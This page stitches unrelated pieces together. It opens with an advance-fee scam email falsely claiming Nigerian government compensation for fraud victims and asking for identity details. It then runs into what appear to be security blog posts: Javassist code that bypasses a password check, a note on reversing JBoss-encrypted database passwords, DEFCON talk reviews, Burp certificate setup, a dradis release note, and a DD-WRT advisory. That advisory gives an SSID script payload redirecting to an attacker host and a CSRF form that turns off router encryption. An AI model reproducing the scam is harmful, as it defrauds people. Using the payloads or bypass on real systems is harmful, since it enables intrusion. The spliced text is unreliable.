Compensation From The Government.

The Chairman
DEBT MANAGEMENT OFFICE
Committee On Government Compensation,
Wuse Zone II, FCT, ABUJA.:
Our Ref : FGN /SNT/STB

Dear Beneficiary,

Re: Government Compensation on Scams Victims, Lotto, Unpaid/Unclaimed
Contract/Donation.

The Federal Government of Nigeria through the President Dr.Goodluck Jonathan GCFR CON, has mandated the Debt management office in colaboration with Nigeria Financial Intelligence Unit (EFCC)to compensate all foreigner’s who in one way or the other has been retrieve of there hard earn money through illegal transaction.

All the Scams Victim who has lost so much to the fraudsters in Nigeria can now be compensation in pro rata of money lost.we are carrying out this verification and payment procedure with guideline from the The Federal Bureau Investigation Director (FBI) Mr.Robert,S.Mueller. The EFCC Chairman Mrs. Farida Waziri agency had not only recovered $6.5bn since its inception but had secured 400 convictions :http://www.punchng.com/Articl.aspx?theartic=Art201006153502178

You are officially informed that the sum of $150,000.00 (One hundred and fifty thousand U. S. dollars only)has been accredited in your favor for compensation due to your inability to claim your funds for some circumstances.

The Instruction has been given to us to Compensate the Scams Victims.Please if you have not been Scammed do not reply this message,it is onlyfor those that were scammed of their money that needs to reply this mail for Compensation.

For processing and verifications, kindly tender the below information:
* Full Name:
* proof of payment/relevant document:
* Phone Number:
* Gender:
* Age:
* Occupation:
* Country:
* Identification:

Direct your information below to the officer that will give instruction to
pay you the Compensation.

Dr. Greg Sambo
DEBT MANAGEMENT OFFICE
Committee On Government Compensation.
email:dmo@contractreviewplanel.fr.fm

However, every now and then, we stumble upon more complex scenarios, for instance, an application whose code has been obfuscated causing decompilation errors. In that case it will no longer be enough to decompile, modify the code and compile again, we would need some other technique. Patching the .class file at the bytecode level sounds like a reasonable approach.

Imagine that the class below (Protected) represents the original class we are dealing with. Remember that we would not have access to this code, instead, we would have been given a compiled an obfuscated version of it (different method names, class names and variable names). Also imagine that the class is substantially more complex and has a number of obscure routines that break the decompilation process.

import java.util.Random;
 
class Protected
{
 
  public static boolean checkPassword(String password)
  {
    return String.valueOf( new Random().nextInt() ).equals(password);
  }
 
  public static void main(String[] argv)
  {
    if (argv.length != 1)
    {
      System.err.println(&quote;Please provide a password.&quote;);
      return;
    }
 
    if ( checkPassword(argv[0]) )
    {
      System.out.println("Success");
    }
    else
    {
      System.out.println("Failure");
    }
  }
}

When compiled (javac Protected.java) and run, the result would be as follows:

$ java Protected p4ssword
Failure

In the obfuscated code scenario you would need to use debugging techniques to identify the relevant code (checkout JSwat for this). So, after hours of going through the decompiled obfuscated code, we have managed to identify that Protected is the class and checkPassword() is the method we want to focus our attention on.

In order to inject at the bytecode level we are going to use Javassist, the Java Programming Assistant. From their website:

[...] it enables Java programs to define a new class at runtime and to modify a class file when the JVM loads it.

Which is exactly what we want to do So here is how you would bypass the checkPassword method by manipulating the bytecode of the class:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

import javassist.*;
 
class Injector
{
 
  public static void main(String[] argv) throws Exception
  {
    // Load the 'Protected' class representation
    ClassPool pool = ClassPool.getDefault();
    CtClass cc = pool.get("Protected");
 
    // Find the method we want to patch and rename it 
    // (we will be creating a new method with the original name).
    CtMethod m_old = cc.getDeclaredMethod("checkPassword");
    m_old.setName( "checkPassword$impl" );
 
    // Create a new method with the same name as the old one
    CtMethod m_new = CtNewMethod.copy(m_old, "checkPassword", cc, null);
 
    // Provide the new method's implementation
    StringBuilder sb = new StringBuilder();
    sb.append( "{ return true; }" );
    m_new.setBody( sb.toString() );
 
    // Add the new method to the class. Patch the .class file
    cc.addMethod( m_new );
    cc.writeFile();
 
    System.out.println("Injection  complete. List of methods:");
    CtMethod[] methods = cc.getDeclaredMethods();
    for( int i=0; i<methods.length ; i++)
    {
      System.out.println( "\t" + methods[i].getLongName() );
    }
  }
}

When run, the Injector application will patch the Protected.class file with a new implementation of the checkPassword() method.

$ javac -cp .:javassist.jar Injector.java
$ java -cp .:javaassist.jar Injector
Injection complete. Methods in class Protected:
    Protected.checkPassword$impl(java.lang.String)
    Protected.main(java.lang.String[])
    Protected.checkPassword(java.lang.String)
$ java Protected p4ssword
Success

This is just a simple example of what can be accomplished with a framework such as Javassist. Check the References section below for additional information.

References

• Sample code at GitHub: http://github.com/usefulfor/
• Javassist (Java Programming Assistant)
• Class transformation with Javassist

The org.jboss.resource.security.SecureIdentityLoginModule from jboss-jca.jar can be used to encrypt database passwords rather than using clear text passwords in the DataSource configuration. [...]

Which in principle, is a great thing. The problem being that usually database credentials end up being placed in the web application configuration file in clear text. However:

[...] It uses a hard-coded password to encrypt/decrypt the DataSource password.

Bottom line, anyone using the SecureIdentityLoginModule to encrypt their password in the configuration file is doing it with a Blowfish algorithm and well known key. So if during an engagement you find a configuration snippet similar to the one below:

<policy>
[...]
  <!-- Example usage of the SecureIdentityLoginModule -->
  <application-policy name="EncryptDBPassword">
    <authentication>
      <login-module code="org.jboss.resource.security.SecureIdentityLoginModule" flag="required">
      <module-option name="username">sa</module-option>
      <module-option name="password">5dfc52b51bd35553df8592078de921bc</module-option>
      <module-option name="managedConnectionFactoryName">[...]</module-option>
    </login-module>
  </authentication>
</application-policy>
[...]
</policy>

You should be able to reverse the encryption and get the credentials in clear text. JBoss.java can help you with this, it is now available in usefulfor's repository at GitHub.

The truth is that you would need 2 or 3 duplicates to get to do all the stuff that you want to do. There are just too many talks, contests and random stuff going on that it is not possible to cover it all. Anyway, below is a breakdown of the talks I managed to get in.

Day 1

• Welcome to Defcon 17 & the Making(and Hacking) of the Defcon Badge

  An intro to the conference and to the Hardware specifications this year's badge had. Checkout the picture of the badge below, it is quite cool with a PIC, a microphone and a multi-LED controller. I still need to find out more about the winners of the hardware hacking contest.

  

• Q & A with Bruce Schenier

  You cannot read Schenier's blog and miss the first opportunity to find out whether he is human or cyborg. I had to be there. A lot of his answers were something like "as I wrote in 200x, blah blah"... which I guess is fair enough. He pitched his SHA-3 algorithm submission but nothing else was really ground-breaking (apart from his funky hat - does anyone have a picture?).

• I missed the More Tricks for Defeating SSL by Moxie Marlinspike (abstract - blackhat slides)

  Apparently this particular talk was really good and I missed it, damn you DEFCON schedule! I need to find
  out more, but the guy found a way around OCSP (a certificate revocation protocol introduced with SSLv3 certificates) that would let an attacker to mitm SSL without the user's browser presenting the funny warning.

• Kenshoto on the organisation of the CTF contest

  Kenshoto is the team that held the CTF contest for the past 4 years. They gave a breakdown of the network / OS infrastructure they had to set up to be able to monitor all the teams and at the same time prevent the teams from hacking the CTF infrastructure for their profit.

  It was a good overview and they also presented some of the challenges that they put the teams through in previous editions. It got scary when they started talking about the time you had to code your shellcode in Morse code or using white spaces and tabs...

• Subverting the World of Warcraft API by Christopher Mooney and James Luedke (abstract)

  Blizzard has changed the rules and doesn't allow programmatic decision making in the game. This guys found a way around this update and created a library that let them use the old functionality and also some of the newly introduced blizzard-only special APIs. They released a library that can be used to create helper characters able to do programmatic decision making

• That Awesome Time I was Sued for Two Billion Dollars by Jason Scott (abstract)

  Yes, I did rise my hand when he asked us if we were in the talk for it's title! A good talk about the personal quest of a crazy guy suing Jason Scott (from textfiles.com) over a file in the site. The guy first
  released a book in exchange of a donation "if you think it is worth it" and then withdrew the release and forbade "the Internet" from using the book quite funny, and really entertaining speaker.

Day 2

• "Smart" Parking Meter by Joe "Kingpin" Grand, Jake Appelbaum and Chris Tarnovsky (abstract)

  Hardware hacking parking meter systems. They found out that the communication protocol between the meter and the smartcard was upside down (the meter provided a password and asked the smartcard to verify it, the meter asked the smartcard to decrease its value when time passed, etc.).

  Very interesting, more if we take into account that most of the meters are used in a number of countries so, it may be worth
  going through the slides. They didn't release code to prevent getting into trouble with the San Francisco transport authority.

• Air Traffic Control by Righter Kunkel (abstract)

  The talk provided good insight on how air traffic control operates and also about the details of the next generation of
  protocols for locating planes that is going to be deployed to replace traditional radar systems. On the other hand, during the talk, the speaker was going to present a denial of service against the control tower of a standard commercial airport. It boiled down to submitting a web form multiple times and hoping that the amount of paper printed by the tower's needle printer would overwhelm the staff and slow down operations

• RFID MythBusting by Chris Paget (abstract)

  It was a bit of a vendor pitch of Chris' new company (check it out! ;0). On the other hand, almost all of his demos didn't work "due to hardware failures". Bad things happen to live demos at conferences that is why we saw quite a few pre-recorded ones...

  He also planed to break the world record on RFID reading distance which didn't happen and also planed on having a huge cloning setup in the conference to show how easy is to clone cards and that it doesn't matter how short range the devices are, but that didn't happen either. If everything works next time, it's going to be amazing, don't miss it!

• Sniff Keystrokes with Lasers/Voltmeters by Andrea Barisani and Daniele Bianco (abstract)

  This one was really good. They used two different methods to sniff keystrokes:

  • Measuring voltage in a distant power socket: it seems that the PS2 keyboard introduces measurable variations in the power consumption of ATX power supplies. This can be measured from distant sockets (over 15 meters away).
  • Using a laser microphone to detect keystroke vibrations. Aiming a laser microphone to a reflective surface of the laptop could enable the vibrations caused by hitting the keys to be detected from the distance.

  Both methods then required the statistical analysis about language patterns and common key combinations already introduced in previous research.

Day 3

• Managed Code Rootkits by Erez Metula (abstract)

  Now you are talking. Really, really good talk on subverting the lower levels of the virtual machine that runs the managed code. From tinkering with variables of the JVM and including additional JAR files in the load path to a pretty crazy strong encryption bypass for .NET assemblies.

  Apparently there is a folder under %windir% where the assemblies are and if you put your modified dll in the right sub folder the CLR wouldn't complain about the signature... I need to go through it to verify the issues, but all the demos were quite scary.

• dradis Framework by etd (abstract - slides)

  It was good A fair amount of people went to the talk and the Q&A session was interesting.

  Finally we got the chance to present the dradis Framework to a broader community. A new release of the framework (2.3) was published and I did a demo showing all the features available interface, import, tool output upload, export, etc. I didn't record a video for 2.3 however checkout the demos section for some screencasts of the tool.

  

  It was a shame that the talk was just before maligno's Tactical Fingerprinting Using Metadata, Hidden Info and Lost Data (abstract) because I had to leave to the Q&A room.

• USB Attacks: Fun with Plug & 0wn by Rafael Dominguez Vega (abstract)

  Rafa presented on the methodology to perform a security review of the USB stack from pure hardware based to pure software based techniques including virtual devices, qemu and a few fuzzing tricks. It was really good, unfortunately for political reasons he could not disclose the specific driver in which the vulnerability was found, although it was one of the stock drivers bundled with the Linux kernel.

  Interesting thought: the issue can be triggered with USB over IP which is also enabled by default in the latest kernels...

What Happens in Vegas Stays in Vegas

There is so much more to DEFCON 17 than what I managed to fit in in this already lengthy post... I hope to be able to make some time and write a follow up on the social / events / people side of things. Good night.

Generate the certificate using OpenSSL:-

$ openssl genrsa 1024 > foo.key
$ openssl req -new -x509 -nodes -sha1 -days 7300 -key foo.key > foo.crt
$ openssl pkcs12 -export -out foo.p12 -in foo.crt -inkey foo.key -name "your name"

You will need the .p12 file (contains key and certificate) to configure Burp. And the .crt file to add it to the Java keystore used by the client. Checkout Burp's help page for instructions on how to get the first done.

Create a Java keystore, import the certificate

Straightforward enough (just remember the password you entered):

keytool.exe -import -file foo.crt -keystore usefulfor.jks -alias burpcert

Run the application and point it to your keystore

java \
  -Djavax.net.ssl.trustStore=usefulfor.jks \
  -Djavax.net.ssl.trustStorePassword=password \
  -Djavax.net.debug=all  \
  com.usefulfor.Demo

Other interesting properties that you may need in order to further tweak the SSL configuration are javax.net.ssl.keyStore and javax.net.ssl.keyStorePassword.

We have been working as hard as one can work: over 487 commits since then (check the stats), we went to DEFCON 16 where a pre-release of the new dradis v2.0 was showcased... But finally we are here, there is a new release ready for you to try and get addicted to!

Lots of new features: new web interface (+10 neatness, +20 usability), new internal architecture (+30 flexibility), new built-in modules (+10 usefulness)...

Changes in the Server

First, we can start having a look at the new web interface:-

As you can see there are no Hosts/Protocols/Services in the screenshot above. It is just a tree of Nodes, and nodes can be anything, hosts, applications, locations, countries... you name it. This gives you the flexibility that was missing in previous releases, you can now use dradis for pentest, web apps, wireless, etc. No restrictions, you can structure your information in the most efficient way.

dradis is built on top of the Rails framework, and with the evolution of Rails comes the evolution of our tool. We now expose our web services through REST, this goes a long way towards extending and connecting dradis with your own tools.

Have you noticed the https:// in the enlarged image? That's right! This release comes with security! (tm). SSL transport and user authentication are finally here.

And as for the fancy, shiny look, we are using ExtJS 2.2 to build the interface. Awesome cross-browser functionality.

Changes in the Client

To match the changes made on the server, we have updated the wxWidgets client to the new Node tree structure. Communication is through SSL, and uses REST web services.

The console interface that was broken in the pre-release is working again, to the delight of hardcore testers and extension developers.

Some obscure re-factoring of the code took place to prepare the different components of the client to work with the Multiverse (not fully complete, not released yet). Some less obscure changes were made to the modules architecture and now we have renamed them to extensions. Old modules will still work in v2.0 only with minor tweaks (john's string encoding extension is now built in and was ported by changing two lines of code 8O).

And for tomorrow we have...

Last but not least, we need to say that there is still lots to be done, lots of enhancements and cool features to add to the framework. Some of them have already been spotted (checkout the roadmap) and some of them will come through feature requests (yes, if you like this or that cool new feature implemented,let us know: feedback[ {at} ]nomejortu{ [dot] }com).

We are all excited about what we have accomplished so far, by the feedback we got from some of the industry's leading professionals. We believe we are already making a difference for the people using dradis in their day-to-day testing, and intend to keep it going, improving a tool that will let us all focus on what we really want: hack them.

I was invited to present my 'Behind Enemy lines' research, which mainly focused on different attack techniques that are currently affecting a large number of administrative web interfaces.

The slides of this presentation can be found here: [1]

More information about this research can be found in the following white paper: [3] [4]

]]>

Last week I attended DEFCON 16 in Las Vegas. I went last year as well, so I knew to expect the huge throngs of people, the strange mix of young, old, and crazy-haired and all the usual antics that happens when you gather around 7 thousand hackers in one place.

There's a lot to do at DEFCON besides attending presentations, but this year I was there for business not just pleasure, so I went on a presentation-attending marathon. I must admit that this year there were less "wow" moments as far as the talks were concerned, but there were still some decent talks ands of course lots of opportunities to catch up with friends and acquaintances from around the world.

Here's a list and some comments of the talks I attended:

Day 1

Time-Based Blind SQL Injection Using Heavy Queries
By: Chema Alonso and Jose Parada

Nice little technique to perform blind SQL injection without the use of delay functions, but instead creating queries which tax the database enough for a noticeable delay to be seen. Nothing ground breaking, but nifty.

Links:

• http://technet.microsoft.com/en-us/library/cc512676.aspx
• http://www.codeplex.com/marathontool

Digital Security: A Risky Business
By: Ian Angell (aka the "Angell of Doom")

A fantastic speaker, and an unusual presentation for DEFCON, dealing with some of the myths and fallacies of the high tech world.

Security and anonymity vulnerabilities in Tor: past, present and future
By: Roger Dingledine

There always seems to be a talk like this at DEFCON now, and its usually pretty interesting. This talk looked back at past Tor vulnerabilities, through to today, and suggested where further problems may lie. Tor's unusual architecture always makes this a fascinating listen.

New Tool for SQL Injection with DNS Exfiltration
By: Robert Ricks

This talk demonstrated a technique and a tool to extract data through an SQL injection vulnerability by tunnelling the data through DNS. This makes for fast extraction as more data can be extracted with each query than in traditional blind SQL injection techniques. The DNS exfiltration method is not new, but Rickses tool targets Oracle which, as far as I know, no practical tool did before.

Anti-RE Techniques in DRM Code
By: Jan Newger

Fascinating look at some of the devious techniques DRM code uses to make it harder to reverse. Slides featured a pixelated section of a diagram to avoid revealing the full DRM algorithm.

NMAP-Scanning the Internet
By: Fyodor

Really enjoyed this one. I hadn't seen Fyodor present before and he is a very engaging speaker. His talk contained some interesting metrics based on his mammoth scans of large parts of the internet, allowing him to give advice on the most efficient scan options. He also added a variety of very nice features to nmap to be released soon.

Keeping Secret Secrets Secret and Sharing Secret Secrets Secretly
By: Vic Vandal

The talk focused mainly on issues surrounding stenography.

Virtually Hacking
By: John Fitzpatrick

John is a colleague of mine, so naturally I went to heckle this presentation In all seriousness though it’s an interesting talk about VMware security. He released some scripts to manipulate VMware in some very interesting ways.

Day 2

RE:Trace: The Reverse Engineer's Unexpected Swiss Army Knife
By: David Weston and Tiler Beauchamp

This was a great talk, and one I will probably use in some future research of mine. RE:Trace is a ruby framework written around DTrace which allows you to do some kung-fu to help in reverse engineering and exploit writing. Includes some very nice integration with IDA Pro.

Hacking Desire
By: Ian Clarke

Not what I expected, but interesting nonetheless, the talk focussed on how systems can build a predictive picture of what users like.

Feed my SAT Monkey
By: Major Malfunction (aka Adam Laurie)

Hacking satellites. Do I need to say anymore? Well ok, no sending data to satellites here, but interesting insight into the world of hunting for interesting signals. Including tcp/ip data that you "wouldn't believe".

Is that a unique credential in your pocket or are you just pleased to see me?
By: Zac Franken

If you've never seen someone take a silicone cast of their hand to fool a hand scanner, you haven't lived.

VulnCatcher: Fun with Vtrace and Programmatic Debugging
By: atlas

This talk shows techniques for programmatically finding when an exploitable bug "likely" occurred during fuzzing, so you can hone in on the truly interesting crashes quickly. Included an amusing interruption in which atlas was attacked by a fully automatic nerf gun.

Introducing Momentary Faults Within Secure Smartcards/Microcontrollers
By: Christopher Tarnovsky

Some of this talk was a bit over my head (I'm a software monkey at heart), but it was quite amazing to see how you could physically mess with circuits on a chip to bypass certain restrictions. Included live, participatory demonstration!

Day 3

Malware Detection Through Network Flow Analysis
By: Bruce Potter

Its not as if you can not go to a Bruce Potter talk. He started off with some insightful comments about the security industry generally, and moved on the to main topic of discussion, showing how best to analyse network flow from a security analysts point of view, as opposed to a purely operational concerned person. Before the talk, Bruce took part in a small TF2 lan game that was stuck up on the big screen as we filed in.

Advanced Software Armouring and Polymorphic Kung-Fu
By: Nick Harbour

Nick Harbour had developed a pretty cool packer which used some amazing
techniques to screw with analysis of the disassembly. My favourite was
instructions that jump half way into their own bytecode at which point
new meaningful instructions emerge.

DNS
By: Dan Kaminsky

If I have to explain this one, you must have been living under a rock. I actually only caught the second half, as the line to get in to his talk was insanely long. But he spoke for almost 2 hours and I managed to hear some of his comments on the implications of easy DNS poisoning. Afterwards, he gave out cookies!

Race-2-Zero Unpacked
By: Simon Howard

A dissection of the controversial Race-2-Zero contest in which participants had to get various malware past virus scanning engines.

Toaster, a Modular NetBSD Rootkit
By: Anthony Martinez and Thomas Bowen

The guys seemed quite nervous in this presentation, but the material behind it was an interesting look at how they implemented this BSD rootkit.

Malware RCE: Debuggers and Decryptor Development
By: Michael Ligh and Greg Sinclair

This demo driven presentation looked at techniques and tips for effectively analysing malware samples.

en-Testing is Dead, Long Live the Pen Test
By: Taylor Banks and Carric

An insightful look at the history and development of pentesting, its roots in hacker culture, what went wrong, and how to progress into the future.

Summary

I really enjoyed The Pen-Test is Dead Long Live the Pentest as it tied in quite closely with what I am seeing myself and the changes we are making at MWR InfoSecurity. On a technical level my favourite talks were probably RE:Trace, Anti-RE Techniques in DRM Code and Polymorphic Kung-Fu. I wish I had got to see Jason Scott's talk, he has to be one of my favourite speakers, but his talk wasn't technical and as I was there on company time I decided to take in the technical talks on at the same time instead.

An attacker could set up a fake AP with a malicious payload in the Service Set Identifier (SSID). The malicious SSID would be displayed in the ‘Neighbour’s Access Points Table’ page of the administrative interface and would be executed when an administrator scanned for APs.

Circumstances

Device providing an administrative web interface with a ‘Neighbourhood Wireless Scan’ functionality.

Cause

The device administrative web interface does not properly sanitise parameters that are passed to it from identified access points.

Exploitation

An attacker could set up a fake access point broadcasting specially crafted 802.11 ‘beacon’
packets containing a malicious payload in the SSID.

The malicious SSID will be displayed in the ‘Neighbor’s Wireless Networks’ page of the affected device administrative interface and will be executed when an administrator scans for wireless access points.

Impact

Administrative web interfaces normally have highly privileged access to operating system functions via in-built script. In combination with a CSRF technique an attacker could fully compromise the affected system.

Dependencies

• The attacker would need to be in wireless range of the affected device. However, nowadays, antennas are available which can dramatically increase the distance that can exist between an attacker and their target
• SSIDs have a maximum length of 32 characters and this would not normally be sufficient to inject a usable malicious payload for an attack. However, an attacker could set up two fake access points and deliver a payload using the combined content of both SSIDs. A payload of 64 characters would be enough to redirect a user’s browser to a malicious web server.

Attack Technique

1. An attacker sets up two fake AP broadcasting specially crafted 802.11 beacon packets containing a malicious payload in the SSID

SSID of the first access point: -

<script>location=/*

SSID of the second access point: -

*/"http://attacker";</script>

A malicious SSID combined together with the use of JavaScript comment tags (/* */) will make the following payload usable in an attack.

<script>location="http://attacker";</script>

2. This malicious SSIDs will be displayed in the 'Neighbour's Wireless' page of the affected device administrative interdace and will be executed when an administrator scans for wireless APs

3. The malicious payload references to a script hosted in the attacker's web server. Below it can be seen an example of the malicious script hosted in the attacker's web server. This code will vary depending on the affected device.

<html>
<body onload="javascript:document.forms.wpa.submit();">
<form name="wpa" action="http://192.168.1.1/apply.cgi" method="POST">
<input type="hidden" name="submit_button" value="WL_WPATable" />
<input type="hidden" name="action" value="ApplyTake" />
<input type="hidden" name="change_action" value="gozila_cgi" />
<input type="hidden" name="submit_type" value="save" />
<input type="hidden" name="security_varname" />
<input type="hidden" name="security_mode_last" />
<input type="hidden" name="wl_wep_last" />
<input type="hidden" name="filter_mac_value" />
<input type="hidden" name="wl0_security_mode" value="disable" />
</form>
</body>
</html>

4. The malicious script hosted in the attacker's web server is used to perform a CSRF attack against the affected administrative interface. This script causes the administrator's browser to make a POST request to the wireless encryption functionality (apply.cgi) and disables the device's wireless encryption.

Tool: SSID Script Injection [1]

Advisory: DD-WRT SSID Script Injection Vulnerability [1]

Demo: DD-WRT SSID Script Injection Attack [1]

White paper: Behind Enemy Lines [1] [2]

]]> http://usefulfor.com/security/2008/08/04/ssid-script-injection/feed/ 4